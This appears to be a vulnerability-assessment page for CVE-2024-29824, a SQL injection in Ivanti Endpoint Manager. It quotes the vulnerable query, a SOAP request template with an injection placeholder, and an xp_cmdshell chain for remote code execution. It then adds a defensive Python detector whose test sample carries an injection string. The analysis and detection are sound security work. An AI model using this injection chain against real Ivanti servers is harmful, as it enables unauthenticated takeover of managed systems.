CVE-2024-29824 (1 user assessed)
Description
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
Ivanti Endpoint Manager (EPM) versions 2022 SU5 and prior are vulnerable to SQL injection and a patch has been released, as described in the official advisory and the related KB article. It is possible to leverage this vulnerability to achieve unauthenticated remote code execution.
The function RecordGoodApp() in AppMonitorAction.cs is responsible for handling reports of “good” applications.
159 private static void RecordGoodApp(
160     LanDeskDatabase database,
161     string[] tokens,
162     DateTime reportDate,
163     int computer_idn)
164 {
165     try
166     {
167         GoodApp goodApp = new GoodApp(tokens);
168         try
169         {
170             string sql1 = string.Format("Select ReportedGoodApps_Idn from ReportedGoodApps where md5 = '{0}'", (object) goodApp.md5);
171             DataRow row1 = database.ExecuteRow(sql1);
As can be seen in line 170, the goodApp.md5 value is used to construct a SQL query without any sanitization. It happens that this value is user-supplied and this function can be reached through the EventHandler web service endpoint. The attack consists of sending a SOAP request to this endpoint, substituting the MD5 value with the malicious SQL command:
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <UpdateStatusEvents xmlns="http://tempuri.org/">
      <deviceID>string</deviceID>
      <actions>
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          <status>GoodApp=1|md5=<SQL_COMMAND></status>
        </Action>
      </actions>
    </UpdateStatusEvents>
  </soap12:Body>
</soap12:Envelope>
To achieve remote code execution, the MS-SQL special command xp_cmdshell can be used this way:
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '<MALICIOUS COMMAND>'--
A Metasploit module is already available for this attack.
Note that this is an unauthenticated attack and it usually results in privileged access to the vulnerable system. Since Ivanti EPM is usually running as an NT Service user, this can be easily escalated to an NT AUTHORITY\SYSTEM privileged user.
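The request shape above gives a defender something concrete to check for in captured traffic to the EventHandler endpoint: the md5 field of a legitimate GoodApp status is an MD5 digest, so anything other than 32 hexadecimal characters in that position is worth alerting on. The following Python is an added example written for this page (not code from the assessment above, from Metasploit, or from Ivanti); it parses an UpdateStatusEvents envelope using the namespace URIs shown in the request, splits the status string on "|" and "=", and reports any Action whose md5 value is not a clean hex digest. The 32-hex-character expectation and the two constructed sample envelopes are assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET

# Namespaces taken from the UpdateStatusEvents SOAP request shown in the analysis.
SOAP12_NS = "http://www.w3.org/2003/05/soap-envelope"
TEMPURI_NS = "http://tempuri.org/"

# Assumption: a legitimate md5 field is exactly 32 hexadecimal characters.
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_status(status: str) -> dict:
    """Split a 'key=value|key=value' status string into a dict.

    Only the first '=' of each token separates key from value, so a value
    that itself contains '=' is preserved intact rather than truncated."""
    fields = {}
    for token in status.split("|"):
        if "=" in token:
            key, value = token.split("=", 1)
            fields[key.strip()] = value
    return fields


def find_suspicious_md5(soap_body: str) -> list:
    """Return one finding per <Action> whose status md5 is not a hex digest.

    Actions without a status or without an md5 field are ignored; the check
    is only about values that will reach the ReportedGoodApps query."""
    findings = []
    root = ET.fromstring(soap_body)
    # <Action> and <status> inherit the default namespace of UpdateStatusEvents.
    for action in root.iter(f"{{{TEMPURI_NS}}}Action"):
        status_el = action.find(f"{{{TEMPURI_NS}}}status")
        if status_el is None or status_el.text is None:
            continue
        md5 = parse_status(status_el.text).get("md5")
        if md5 is None:
            continue
        if not MD5_RE.match(md5):
            findings.append({
                "action_name": action.get("name"),
                "md5": md5,
                "reason": "md5 field is not a 32-character hex digest",
            })
    return findings


def _envelope(status: str) -> str:
    """Build a constructed sample request with the structure shown in the analysis."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<soap12:Envelope xmlns:soap12="{SOAP12_NS}">'
        '<soap12:Body>'
        f'<UpdateStatusEvents xmlns="{TEMPURI_NS}">'
        '<deviceID>agent-01</deviceID>'
        '<actions>'
        '<Action name="inventory" code="0" date="0" type="96" '
        'user="u" configguid="g" location="l">'
        f'<status>{status}</status>'
        '</Action>'
        '</actions>'
        '</UpdateStatusEvents>'
        '</soap12:Body>'
        '</soap12:Envelope>'
    )


# Constructed samples: a normal report (MD5 of the empty string) and one whose
# md5 field carries a quote-breaking string instead of a digest.
BENIGN_REQUEST = _envelope("GoodApp=1|md5=d41d8cd98f00b204e9800998ecf8427e")
SUSPICIOUS_REQUEST = _envelope("GoodApp=1|md5=' OR 1=1--")

if __name__ == "__main__":
    print("benign:", find_suspicious_md5(BENIGN_REQUEST))
    print("suspicious:", find_suspicious_md5(SUSPICIOUS_REQUEST))
```

This detects only the injection path described here (the md5 field of a GoodApp status); it does not replace patching, and the root-cause fix on the server side is to bind goodApp.md5 as a query parameter rather than formatting it into the SQL string.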
General Information
Vendors
- ivanti
Products
- endpoint manager
- endpoint manager 2022